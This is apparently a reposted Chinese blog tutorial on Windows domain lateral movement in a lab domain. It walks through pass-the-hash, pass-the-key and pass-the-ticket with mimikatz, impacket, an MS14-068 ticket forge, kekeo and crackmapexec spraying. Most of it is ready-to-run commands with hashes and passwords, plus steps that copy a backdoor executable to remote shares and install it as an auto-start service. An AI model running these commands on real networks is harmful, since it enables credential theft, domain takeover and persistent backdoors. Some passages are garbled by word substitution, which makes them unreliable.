【内网安全】横向移动-PTH哈希-PTT票据-PTK密钥

PTH PTT PTK 简介

1. pass the hash（哈希传递攻击，简称pth）
2. pass the ticket（票据传递攻击，简称ptt）
3. pass the key（密钥传递攻击，简称ptk）
4. PTH(pass the hash)   利用的lm或ntlm的值进行的渗透测试（NTLM认证攻击）
5. PTK(pass the key)    利用的ekeys aes256进行的渗透测试（NTLM认证攻击）
6. PTT(pass the ticket) 利用的票据凭证TGT进行渗透测试（Kerberos认证攻击)

复制代码

横向移动前置与情况搭建

看之前的文章 【内网安全】横向移动-Wmi-Smb-CME暗码喷射-CSDN博客
域横向移动-PTH-Mimikatz&NTLM

PTH = Pass The Hash，通过暗码散列值 (通常是NTLM Hash)来举行攻击。
在域情况中，用户登录计算机时利用的域账号，计算时机用相同本地管理员账号和暗码。
因此，如果计算机的本地管理员账号和暗码也是相同的，攻击者就可以利用哈希通报的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前利用到的暗码散列值是LM、NTLM，在2012 R2及其版本之后利用到的暗码散列值是NTLM Hash。
1、Mimikatz

获取Mimikatz的更高权限，以便后续操作

1. mimikatz privilege::debug

复制代码

PTK连接32主机，并且会在当前主机弹回一个cmd

1. mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c

复制代码

cs中执行上面的下令

会在执行下令的主机上弹出一个cmd。可以在上面临32主机举行下令执行

上线32主机

1. 连接32主机方便进行文件传输
2. net use \\192.168.3.32\c$
4. 复制本机的后门到32
5. copy c:\4455.exe \\192.168.3.32\c$
7. 在32主机创建一个名为‘bshell’的服务，并绑定4455.exe
8. sc \\sqlserver create ashell binpath= "c:\4455.exe" start=auto #开启自启服务，可以不加
10. 运行服务
11. sc \\sqlserver start ashell

复制代码

成功上线

此中 192.168.3.32 也可以改成用户名字 如32的用户 sqlserver
这里有个比力严重的问题。当你执行 sc \\sqlserver start ashell 后过一小会就会表现

然后你的cs就掉了
2、impacket-at&ps&wmi&smb

1. psexec -hashes :NTLM值 域名/域用户@域内ip地址
2. python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
4. smbexec -hashes :NTLM值 域名/域用户@域内ip地址
5. python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
7. wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
8. python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

复制代码

NTLM值可以在CS里面用抓取

域横向移动-PTK-Mimikatz&AES256(鸡肋)

PTK = Pass The Key，当系统安装了KB2871997补丁且禁用了NTLM的时间，
那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式得到权限。

1. mimikatz sekurlsa::ekeys
2. mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

复制代码

域横向移动-PTT-漏洞&Kekeo&Ticket

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases
1、漏洞-MS14068

(webadmin权限)-利用漏洞天生的用户的新身份票据实验认证
MS14-068是密钥分发中央（KDC）服务中的Windows漏洞。
它允许颠末身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。
该漏洞位于kdcsvc.dll域控制器的密钥分发中央(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来得到票证.
获取SID值：

1. shell whoami/user

复制代码

天生票据文件：

1. shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45

复制代码

查看当前票据

1. shell klist

复制代码

清除票据连接：

1. shell klist
4. purge

复制代码

内存导入票据：

1. mimikatz kerberos::ptc TGT_webadmin@god.org.ccache

复制代码

票据是偶然效的（失效后就连接不上了)
连接目标上线：

1. 这里建议写计算机名，ip可能失效
2. shell dir \\OWA2010CN-GOD\c$
3. shell net use \\OWA2010CN-GOD\C$
4. copy c:\4455.exe \\OWA2010CN-GOD\C$
5. sc \\OWA2010CN-GOD create bindshell binpath= "c:\4455.exe"
6. sc \\OWA2010CN-GOD start bindshell

复制代码

注意：成功不成功看DC域控漏洞补丁打没打
2、kekeo 第三方票据天生工具

(高权限，需NTLM)-利用获取的NTLM天生新的票据实验认证
因为当前主机肯定之前与其他主机连接过，以是本地应该天生了一些票据，
我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie诱骗
缺点：票据是有有效期的，以是如果当前主机在连接过域控的话，有效期内可利用。
天生票据：

1. shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"

复制代码

导入票据：

1. shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"

复制代码

查看票据：

1. shell klist

复制代码

利用票据连接：

1. shell dir \\owa2010cn-god\c$

复制代码

注意：因为kekeo只是一个票据天生工具，并不是利用漏洞，以是能不能连接成功看ntlm哈希值的正确性
3、mimikatz

(高权限,需Ticket)-利用历史遗留的票据重新认证实验
导出票据：

1. mimikatz sekurlsa::tickets /export

复制代码

导入票据：

1. mimikatz kerberos::ptt C:\Users\webadmin\Desktop\TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

复制代码

导入与域控连接的票据

查看票据：

1. shell klist

复制代码

利用票据连接：

1. shell dir \\owa2010cn-god\c$

复制代码

注意：成功不成功看当前主机有没有被目标连接过
域横向移动-PTH-Proxychains&CrackMapExec

CrackMapExec

Github：GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
官方手册：Site Unreachable
下载对应release，建立socks连接，设置socks署理，设置规则利用
1、Linux Proxychains利用

署理设置：

1. Proxychains.conf

复制代码

署理调用：

1. Proxychains 命令

复制代码

2、暗码喷射-域用户登录PTH：

域用户HASH登录

1. proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c

复制代码

本地用户HASH登录

1. proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c
2. --local-auth

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。